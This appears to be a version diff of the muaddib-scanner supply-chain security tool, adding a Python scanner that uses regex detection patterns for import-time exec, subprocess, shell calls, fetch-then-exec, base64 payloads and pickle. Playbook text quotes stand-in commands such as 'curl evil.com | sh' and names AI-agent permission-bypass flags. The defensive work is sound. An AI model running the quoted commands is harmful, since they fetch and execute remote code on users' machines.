muaddib-scanner 2.11.40 → 2.11.42

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.40",
+  "version": "2.11.42",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/{self-scan-v2.11.40.json → self-scan-v2.11.42.json}

@@ -1,6 +1,6 @@
 {
   "target": "node_modules",
-  "timestamp": "2026-05-25T09:38:49.363Z",
+  "timestamp": "2026-05-25T11:55:42.312Z",
   "threats": [
     {
       "type": "string_mutation_obfuscation",

package/src/pipeline/executor.js

@@ -20,6 +20,7 @@ const { deobfuscate } = require('../scanner/deobfuscate.js');
 const { buildModuleGraph, annotateTaintedExports, detectCrossFileFlows, annotateSinkExports, detectCallbackCrossFileFlows, detectEventEmitterFlows } = require('../scanner/module-graph');
 const { loadCachedIOCs, checkIOCStaleness } = require('../ioc/updater.js');
 const { detectPythonProject, normalizePythonName } = require('../scanner/python.js');
+const { scanPythonSource } = require('../scanner/python-source.js');
 const { Spinner, listInstalledPackages, wasFilesCapped, getOverflowFiles, debugLog } = require('../utils.js');
 const { getMaxFileSize } = require('../shared/constants.js');
 const { scanParanoid } = require('../scanner/paranoid.js');
@@ -202,7 +203,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     'scanDependencies', 'scanHashes', 'analyzeDataFlow', 'scanTyposquatting',
     'scanGitHubActions', 'matchPythonIOCs', 'checkPyPITyposquatting',
     'scanEntropy', 'scanAIConfig', 'scanIocStrings', 'scanAntiForensic',
-    'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff'
+    'scanStubPackage', 'scanMonorepo', 'scanTrustedDepDiff', 'scanPythonSource'
   ];
 
   const settledResults = await Promise.allSettled([
@@ -228,7 +229,12 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     // Wrapped in withTimeout as defense in depth: scanner has its own 10s + 5s × N
     // internal timeouts, but a registry slowdown with many added deps could exceed
     // the static-scan budget without this cap.
-    withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff')
+    withTimeout(() => scanTrustedDepDiff(targetPath, options), 'scanTrustedDepDiff'),
+    // PYSRC-001..008 (v2.11.25, TrapDoor PyPI gap). Detect import-time RCE
+    // in __init__.py / setup.py / top-level .py files. Runs always — not gated
+    // on detectPythonProject() because an attacker can ship a malicious __init__.py
+    // without a requirements.txt. Walker is cheap (just a depth-1 readdir).
+    yieldThen(() => scanPythonSource(targetPath))
   ]);
 
   // Extract results: use empty array for rejected scanners, log errors
@@ -258,7 +264,8 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     antiForensicThreats,
     stubPackageThreats,
     monorepoThreats,
-    trustedDepDiffThreats
+    trustedDepDiffThreats,
+    pythonSourceThreats
   ] = scanResult;
 
   // Emit warning if file count cap was hit + quick-scan overflow files
@@ -339,6 +346,7 @@ async function execute(targetPath, options, pythonDeps, warnings) {
     ...stubPackageThreats,
     ...monorepoThreats,
     ...trustedDepDiffThreats,
+    ...pythonSourceThreats,
     ...crossFileFlows.filter(f => f && f.sourceFile && f.sinkFile).map(f => ({
       type: f.type,
       severity: f.severity,

package/src/response/playbooks.js

@@ -409,6 +409,59 @@ const PLAYBOOKS = {
     'pour inspecter le contenu reel. Supprimer le fichier ou nettoyer les caracteres invisibles ' +
     'avant toute utilisation. Si deja ouvert avec un agent IA, regenerer tous les secrets touches.',
 
+  import_time_exec:
+    'CRITIQUE: Le fichier Python (__init__.py / setup.py / module top-level) execute exec() ou eval() ' +
+    'a l\'import ou pip install. RCE immediat sur la machine de l\'utilisateur. ' +
+    'NE PAS installer ce package. Si deja installe: pip uninstall immediatement, ' +
+    'auditer les processus en cours, regenerer les credentials potentiellement compromis. ' +
+    'Inspecter le code exec/eval pour identifier le payload reel.',
+
+  import_time_subprocess:
+    'CRITIQUE: Le fichier Python spawn un processus externe (subprocess.Popen/run/call/check_output) ' +
+    'a l\'import ou pip install. Generalement utilise pour fetch + execute remote payload, ' +
+    'lateral movement, ou installation de persistence. NE PAS installer. Verifier le contenu ' +
+    'de l\'appel pour identifier la commande executee. Auditer les processus enfants si deja installe.',
+
+  import_time_os_system:
+    'CRITIQUE: Le fichier Python execute des commandes shell (os.system / os.popen / os.spawn / os.exec) ' +
+    'a l\'import ou pip install. Pattern frequent: "curl evil.com | sh" ou "wget evil.com | bash". ' +
+    'NE PAS installer. Inspecter la commande exacte. Si execute: considerer la machine compromise.',
+
+  import_time_fetch_exec:
+    'CRITIQUE: Pattern TrapDoor detecte. Le fichier Python fetch un payload depuis le reseau ' +
+    '(urllib/requests/http.client/httpx/aiohttp) ET execute du code (exec/eval) dans le meme fichier. ' +
+    'C\'est la signature directe d\'une remote-payload-then-RCE. NE PAS installer. ' +
+    'Bloquer le domaine du fetch dans le firewall. Si execute: incident response complet, ' +
+    'regenerer TOUS les secrets sur la machine (SSH, AWS, GitHub, npm, env vars).',
+
+  import_time_base64_exec:
+    'CRITIQUE: Le fichier Python base64-decode du contenu ET execute (exec/eval) dans le meme fichier. ' +
+    'Pattern d\'obfuscation classique: payload encode pour echapper a la revue + grep statique. ' +
+    'NE PAS installer. Decoder le base64 manuellement pour identifier le payload reel ' +
+    '(python3 -c "import base64; print(base64.b64decode(b\'<payload>\').decode())").',
+
+  import_time_deserialization:
+    'CRITIQUE: Le fichier Python utilise pickle/marshal/dill/cloudpickle .loads() au niveau module. ' +
+    'Ces fonctions sont triviallement RCE si l\'input deserializise vient d\'une source attaquant-controllee ' +
+    '(fichier sur disque, requete HTTP, env var). NE PAS installer si l\'origine du blob deserialize ' +
+    'n\'est pas un fichier de donnees interne au package. Si interne: verifier l\'integrite (signature, hash).',
+
+  dynamic_dangerous_import:
+    'HIGH: Le fichier Python utilise __import__() avec un nom hardcode dangereux ' +
+    '(subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). ' +
+    'Pattern d\'obfuscation: evite "import X" statique pour bypass les scanners qui ne tracent ' +
+    'que les imports declares. Combinaison avec exec/subprocess/fetch indique malveillance. ' +
+    'Inspecter manuellement les appels suivants au module dynamiquement importe.',
+
+  python_source_unicode_obfuscation:
+    'CRITIQUE: Fichier Python contient ≥5 caracteres Unicode invisibles ' +
+    '(zero-width, directional override, variation selectors, tag characters). ' +
+    'Python rejette les identifiers avec ZW (PEP 3131 SyntaxError), donc le vecteur est ' +
+    'soit (a) obfuscation dans des strings (GlassWorm-style payload encoding via variation selectors), ' +
+    'soit (b) comments avec ZW pour induire en erreur la revue humaine. ' +
+    'NE PAS installer. Ouvrir le fichier dans un editeur affichant les caracteres invisibles ' +
+    '(VS Code: "editor.renderControlCharacters") pour inspecter le contenu reel.',
+
   ai_agent_abuse:
     'CRITIQUE: Un agent IA (Claude, Gemini, Q) est invoque avec des flags de bypass de securite ' +
     '(--dangerously-skip-permissions, --yolo, --trust-all-tools). Technique s1ngularity/Nx. ' +

package/src/rules/index.js

@@ -224,6 +224,121 @@ const RULES = {
     ],
     mitre: 'T1195.002'
   },
+
+  // PYSRC-001 a 008 — Python source scanner (TrapDoor PyPI gap, v2.11.25).
+  // python.js est manifest-only ; ast.js/dataflow.js sont JS-only ; ioc-strings.js
+  // fait du literal match. Aucun ne couvre l'execution a l'import via __init__.py
+  // / setup.py. Ces 8 regles ferment ce gap.
+  import_time_exec: {
+    id: 'MUADDIB-PYSRC-001',
+    name: 'Python Import-Time exec/eval',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Fichier Python (__init__.py, setup.py, top-level *.py) contient exec()/eval() — execution directe de code a l\'import ou a pip install. RCE immediat sur la machine de l\'utilisateur. Pattern central de TrapDoor (mai 2026).',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://attack.mitre.org/techniques/T1059/006/'
+    ],
+    mitre: 'T1059.006'
+  },
+  import_time_subprocess: {
+    id: 'MUADDIB-PYSRC-002',
+    name: 'Python Import-Time subprocess',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Fichier Python contient subprocess.Popen/run/call/check_output au niveau module — spawn d\'un processus externe a l\'import ou pip install. Utilise pour fetch + execute remote payload ou pour latteral movement.',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://attack.mitre.org/techniques/T1059/006/'
+    ],
+    mitre: 'T1059.006'
+  },
+  import_time_os_system: {
+    id: 'MUADDIB-PYSRC-003',
+    name: 'Python Import-Time os.system / os.popen / os.spawn / os.exec',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Fichier Python contient os.system(), os.popen(), os.spawn*() ou os.exec*() au niveau module — shell execution a l\'import ou pip install. Generalement utilise pour curl|sh ou wget|bash remote payload.',
+    references: [
+      'https://attack.mitre.org/techniques/T1059/006/',
+      'https://attack.mitre.org/techniques/T1059/004/'
+    ],
+    mitre: 'T1059.006'
+  },
+  import_time_fetch_exec: {
+    id: 'MUADDIB-PYSRC-004',
+    name: 'Python Import-Time Fetch + Exec (TrapDoor pattern)',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Compound detection : le meme fichier Python contient (urllib.request / requests / http.client / httpx / aiohttp) ET exec()/eval(). Signature directe de TrapDoor : telecharge un payload depuis le C2 et l\'execute. Implique RCE + capacite C2 active.',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://attack.mitre.org/techniques/T1105/',
+      'https://attack.mitre.org/techniques/T1059/006/'
+    ],
+    mitre: 'T1105'
+  },
+  import_time_base64_exec: {
+    id: 'MUADDIB-PYSRC-005',
+    name: 'Python Import-Time Base64 Decode + Exec',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Compound detection : le meme fichier Python contient base64.b64decode / codecs.decode ET exec()/eval(). Pattern d\'obfuscation classique : payload encode en base64 (parfois chaine multiple) puis execute. Vu dans Lazarus PyPI campaigns + TrapDoor.',
+    references: [
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://attack.mitre.org/techniques/T1027/',
+      'https://attack.mitre.org/techniques/T1059/006/'
+    ],
+    mitre: 'T1027'
+  },
+  import_time_deserialization: {
+    id: 'MUADDIB-PYSRC-006',
+    name: 'Python Import-Time Unsafe Deserialization',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'vulnerability',
+    description: 'Fichier Python utilise pickle/cPickle/marshal/dill/cloudpickle/jsonpickle/shelve .loads() au niveau module. Ces fonctions sont trivialement RCE si l\'input est attaquant-controle (deserialization = code execution). Risque critique meme sans malveillance prouvee.',
+    references: [
+      'https://docs.python.org/3/library/pickle.html#restricting-globals',
+      'https://attack.mitre.org/techniques/T1059/006/',
+      'https://cwe.mitre.org/data/definitions/502.html'
+    ],
+    mitre: 'T1059.006'
+  },
+  dynamic_dangerous_import: {
+    id: 'MUADDIB-PYSRC-007',
+    name: 'Python Dynamic __import__ of Dangerous Module',
+    severity: 'HIGH',
+    confidence: 'medium',
+    domain: 'malware',
+    description: 'Fichier Python utilise __import__() avec un nom hardcode dangereux (subprocess, os, requests, urllib, socket, http, ssl, ctypes, importlib). Pattern d\'obfuscation : evite l\'instruction "import X" statique pour echapper aux scanners qui ne tracent que les imports declares.',
+    references: [
+      'https://attack.mitre.org/techniques/T1027/',
+      'https://docs.python.org/3/library/functions.html#import__'
+    ],
+    mitre: 'T1027'
+  },
+  python_source_unicode_obfuscation: {
+    id: 'MUADDIB-PYSRC-008',
+    name: 'Python Source Unicode Obfuscation',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    domain: 'malware',
+    description: 'Fichier Python contient ≥5 caracteres Unicode invisibles (zero-width, directional override, variation selectors, tag characters). Mirror de AICONF-004 pour les sources .py. Python rejette les identifiers avec ZW chars (SyntaxError, PEP 3131), donc le vecteur principal c\'est l\'obfuscation dans les strings (GlassWorm-style payload encoding) ou dans les comments (mislead human review).',
+    references: [
+      'https://www.aikido.dev/blog/glassworm-returns-unicode-attack-github-npm-vscode',
+      'https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates',
+      'https://trojansource.codes/',
+      'https://attack.mitre.org/techniques/T1027/'
+    ],
+    mitre: 'T1027.013'
+  },
+
   suspicious_file: {
     id: 'MUADDIB-DEP-002',
     name: 'Suspicious File in Dependency',

package/src/scanner/python-source.js

@@ -0,0 +1,319 @@
+'use strict';
+
+/**
+ * Python Source Scanner — detects import-time / install-time RCE patterns.
+ *
+ * Created v2.11.25 (TrapDoor PyPI gap, mai 2026). `python.js` is a manifest
+ * parser (requirements.txt, setup.py, pyproject.toml — extracts dep names) ;
+ * it never reads package source. `ast.js` / `dataflow.js` use acorn (JS only)
+ * and skip `.py`. Only `ioc-strings.js` opens `.py` files, just for literal
+ * IOC matching. → A malicious `__init__.py` that fetches + execs a payload at
+ * import time was invisible to MUAD'DIB. This scanner closes that gap.
+ *
+ * Pas d'AST Python (CLAUDE.md interdit les deps runtime hors acorn / js-yaml /
+ * adm-zip / @inquirer/prompts). Détection par regex ciblées sur les API
+ * dangereuses, avec préprocessing :
+ *  - strip des full-line comments (`^\s*#.*$`)
+ *  - strip des triple-quoted strings (docstrings, block strings — réduit les
+ *    FPs sur les docs qui mentionnent `exec`)
+ *  - strip des chars Unicode invisibles via le helper partagé (mirror du fix
+ *    AICONF-004 : empêche `e<ZWSP>xec(` de bypass — bien que Python rejette
+ *    cet identifier comme SyntaxError, des invisibles dans des strings/comments
+ *    restent un signal d'obfuscation valide).
+ *
+ * Rules : PYSRC-001 à PYSRC-008. Voir src/rules/index.js pour le détail.
+ *
+ * Références :
+ *  - https://socket.dev/blog/trapdoor-crypto-stealer-npm-pypi-crates (mai 2026)
+ *  - https://attack.mitre.org/techniques/T1059/006/ (Command Scripting Interpreter: Python)
+ */
+
+const fs = require('fs');
+const path = require('path');
+const { countInvisibleUnicode, stripInvisibleUnicode } = require('../shared/unicode-invisibles.js');
+
+const MAX_FILE_SIZE = 1024 * 1024; // 1 MB cap, cohérent avec ai-config.js
+
+const PYSRC_UNICODE_THRESHOLD = 5;
+
+// Dirs to skip when looking for __init__.py at depth-1. Couvre les patterns
+// classiques (virtualenv, caches, tests, docs, build artifacts).
+const EXCLUDED_DIRS = new Set([
+  'tests', 'test', '__pycache__', '.pytest_cache', '.tox', '.nox',
+  '.venv', 'venv', 'env', '.env',
+  '.git', '.hg', '.svn',
+  'node_modules',
+  'examples', 'example', 'sample', 'samples',
+  'docs', 'doc',
+  'build', 'dist', 'site-packages',
+  '.mypy_cache', '.ruff_cache', '.pytype', '.pyre',
+  '.muaddib-cache', '.idea', '.vscode'
+]);
+
+// Files explicitly targeted at root (always scanned if present).
+const ROOT_TARGET_FILES = ['__init__.py', 'setup.py'];
+
+/**
+ * Locate Python files that execute at import or install time.
+ *
+ * @param {string} targetPath
+ * @returns {string[]} Absolute file paths, deduplicated.
+ */
+function findTargetPythonFiles(targetPath) {
+  const targets = new Set();
+
+  let rootEntries;
+  try {
+    rootEntries = fs.readdirSync(targetPath);
+  } catch {
+    return [];
+  }
+
+  // 1. ROOT_TARGET_FILES + every *.py at root (single-module packages)
+  for (const entry of rootEntries) {
+    if (!entry.endsWith('.py') && !ROOT_TARGET_FILES.includes(entry)) continue;
+    const full = path.join(targetPath, entry);
+    try {
+      if (fs.statSync(full).isFile()) targets.add(full);
+    } catch { /* ignore */ }
+  }
+
+  // 2. <subdir>/__init__.py at depth 1 (covers <pkg>/__init__.py layout)
+  for (const entry of rootEntries) {
+    if (EXCLUDED_DIRS.has(entry)) continue;
+    if (entry.startsWith('.') && entry !== '.') continue; // skip hidden dirs by default
+    const subdir = path.join(targetPath, entry);
+    try {
+      if (!fs.statSync(subdir).isDirectory()) continue;
+    } catch { continue; }
+
+    const initPy = path.join(subdir, '__init__.py');
+    try {
+      if (fs.statSync(initPy).isFile()) targets.add(initPy);
+    } catch { /* not a file */ }
+
+    // 3. src/<pkg>/__init__.py for PEP-518 src-layout
+    if (entry === 'src') {
+      let innerEntries;
+      try {
+        innerEntries = fs.readdirSync(subdir);
+      } catch { continue; }
+      for (const inner of innerEntries) {
+        if (EXCLUDED_DIRS.has(inner)) continue;
+        if (inner.startsWith('.')) continue;
+        const innerDir = path.join(subdir, inner);
+        try {
+          if (!fs.statSync(innerDir).isDirectory()) continue;
+        } catch { continue; }
+        const innerInit = path.join(innerDir, '__init__.py');
+        try {
+          if (fs.statSync(innerInit).isFile()) targets.add(innerInit);
+        } catch { /* not a file */ }
+      }
+    }
+  }
+
+  return [...targets];
+}
+
+/**
+ * Strip full-line Python comments (lines whose first non-whitespace char is `#`).
+ * Inline trailing comments are kept to avoid the complexity of a tokenizer.
+ *
+ * @param {string} content
+ * @returns {string}
+ */
+function stripPythonComments(content) {
+  return content.split(/\r?\n/).map(line => {
+    const trimmed = line.trimStart();
+    if (trimmed.startsWith('#')) return '';
+    return line;
+  }).join('\n');
+}
+
+/**
+ * Strip triple-quoted strings (`"""..."""` and `'''...'''`). These are
+ * typically docstrings or block-string literals containing free-form text
+ * that may mention keywords like `exec` or `subprocess` without being a real
+ * call site. Single-quoted strings are preserved (an attacker often hides
+ * the payload inside `exec("import os; ...")`).
+ *
+ * @param {string} content
+ * @returns {string}
+ */
+function stripTripleQuotedStrings(content) {
+  return content
+    .replace(/"""[\s\S]*?"""/g, '""')
+    .replace(/'''[\s\S]*?'''/g, "''");
+}
+
+// --- Pattern detectors. All operate on a content string that has already
+// been Unicode-normalized + comment-stripped + docstring-stripped.
+
+function detectImportTimeExec(content) {
+  // exec(...) or eval(...). Lookbehind excludes obj.exec(, ast.literal_eval(.
+  return /(?<![.\w])(exec|eval)\s*\(/.test(content);
+}
+
+function detectImportTimeSubprocess(content) {
+  return /\bsubprocess\.(Popen|run|call|check_output|check_call|getoutput|getstatusoutput)\s*\(/.test(content);
+}
+
+function detectImportTimeOsSystem(content) {
+  // os.system, os.popen, os.spawn*, os.execv/exec*
+  return /\bos\.(system|popen[234]?|spawn[a-z]+|exec[a-z]+)\s*\(/.test(content);
+}
+
+function detectNetworkFetch(content) {
+  if (/\burllib\.request\.urlopen\s*\(/.test(content)) return true;
+  if (/\burllib2\.urlopen\s*\(/.test(content)) return true;
+  if (/\brequests\.(get|post|put|delete|patch|head|options|request)\s*\(/.test(content)) return true;
+  if (/\bhttp\.client\.HTTPS?Connection\b/.test(content)) return true;
+  if (/\bhttpx\.(get|post|put|delete|patch|head|options|request|Client|AsyncClient)\b/.test(content)) return true;
+  if (/\baiohttp\.ClientSession\b/.test(content)) return true;
+  return false;
+}
+
+function detectBase64Decode(content) {
+  if (/\bbase64\.(b64|b32|b16|standard_b64|urlsafe_b64)decode\s*\(/.test(content)) return true;
+  if (/\bcodecs\.decode\s*\(/.test(content)) return true;
+  return false;
+}
+
+function detectDeserialization(content) {
+  return /\b(pickle|cPickle|marshal|dill|cloudpickle|jsonpickle|shelve)\.loads?\s*\(/.test(content);
+}
+
+function detectDynamicDangerousImport(content) {
+  return /__import__\s*\(\s*['"](subprocess|os|requests|urllib|urllib2|socket|http|ssl|ctypes|importlib)['"]/.test(content);
+}
+
+/**
+ * Scan Python source files under targetPath for import-time / install-time RCE.
+ *
+ * @param {string} targetPath
+ * @returns {Array<{type: string, severity: string, message: string, file: string}>}
+ */
+function scanPythonSource(targetPath) {
+  const threats = [];
+
+  const files = findTargetPythonFiles(targetPath);
+  if (files.length === 0) return threats;
+
+  for (const file of files) {
+    let stat;
+    try {
+      stat = fs.statSync(file);
+    } catch { continue; }
+    if (!stat.isFile() || stat.size === 0 || stat.size > MAX_FILE_SIZE) continue;
+
+    let rawContent;
+    try {
+      rawContent = fs.readFileSync(file, 'utf8');
+    } catch { continue; }
+
+    const relPath = path.relative(targetPath, file);
+
+    // 1. PYSRC-008 — Unicode obfuscation (computed on raw content, before strip).
+    const invisibleCount = countInvisibleUnicode(rawContent);
+    if (invisibleCount >= PYSRC_UNICODE_THRESHOLD) {
+      threats.push({
+        type: 'python_source_unicode_obfuscation',
+        severity: 'CRITICAL',
+        message: `${relPath}: ${invisibleCount} invisible Unicode chars (zero-width / directional / variation selectors) — possible obfuscation hiding payload content from human review.`,
+        file: relPath
+      });
+    }
+
+    // 2. Normalize Unicode, strip docstrings + full-line comments.
+    const normalized = invisibleCount > 0 ? stripInvisibleUnicode(rawContent) : rawContent;
+    const cleaned = stripPythonComments(stripTripleQuotedStrings(normalized));
+
+    // 3. Atomic detectors.
+    const hasExec = detectImportTimeExec(cleaned);
+    const hasSubprocess = detectImportTimeSubprocess(cleaned);
+    const hasOsSystem = detectImportTimeOsSystem(cleaned);
+    const hasFetch = detectNetworkFetch(cleaned);
+    const hasBase64 = detectBase64Decode(cleaned);
+    const hasDeser = detectDeserialization(cleaned);
+    const hasDynImport = detectDynamicDangerousImport(cleaned);
+
+    if (hasExec) {
+      threats.push({
+        type: 'import_time_exec',
+        severity: 'CRITICAL',
+        message: `${relPath}: exec()/eval() at module level — direct code execution on import or pip install (RCE).`,
+        file: relPath
+      });
+    }
+    if (hasSubprocess) {
+      threats.push({
+        type: 'import_time_subprocess',
+        severity: 'CRITICAL',
+        message: `${relPath}: subprocess.Popen/run/call/check_output — spawns external process on import or install.`,
+        file: relPath
+      });
+    }
+    if (hasOsSystem) {
+      threats.push({
+        type: 'import_time_os_system',
+        severity: 'CRITICAL',
+        message: `${relPath}: os.system()/os.popen()/os.spawn*()/os.exec*() — shell execution on import or install.`,
+        file: relPath
+      });
+    }
+    if (hasDeser) {
+      threats.push({
+        type: 'import_time_deserialization',
+        severity: 'CRITICAL',
+        message: `${relPath}: pickle/marshal/dill/cloudpickle/jsonpickle .loads() — unsafe deserialization, trivially RCE if input is attacker-controlled.`,
+        file: relPath
+      });
+    }
+    if (hasDynImport) {
+      threats.push({
+        type: 'dynamic_dangerous_import',
+        severity: 'HIGH',
+        message: `${relPath}: __import__() with hardcoded dangerous module name (subprocess/os/requests/urllib/socket/...) — obfuscation pattern to evade static analysis.`,
+        file: relPath
+      });
+    }
+
+    // 4. Compound detectors (in addition to individual fires).
+    if (hasFetch && hasExec) {
+      threats.push({
+        type: 'import_time_fetch_exec',
+        severity: 'CRITICAL',
+        message: `${relPath}: network fetch (urllib/requests/http.client/httpx/aiohttp) AND exec/eval in same file — TrapDoor-style remote-payload-then-RCE.`,
+        file: relPath
+      });
+    }
+    if (hasBase64 && hasExec) {
+      threats.push({
+        type: 'import_time_base64_exec',
+        severity: 'CRITICAL',
+        message: `${relPath}: base64/codecs decode AND exec/eval in same file — obfuscated payload execution pattern.`,
+        file: relPath
+      });
+    }
+  }
+
+  return threats;
+}
+
+module.exports = {
+  scanPythonSource,
+  // Exported for unit testing of the helpers in isolation.
+  _internal: {
+    findTargetPythonFiles,
+    stripPythonComments,
+    stripTripleQuotedStrings,
+    detectImportTimeExec,
+    detectImportTimeSubprocess,
+    detectImportTimeOsSystem,
+    detectNetworkFetch,
+    detectBase64Decode,
+    detectDeserialization,
+    detectDynamicDangerousImport
+  }
+};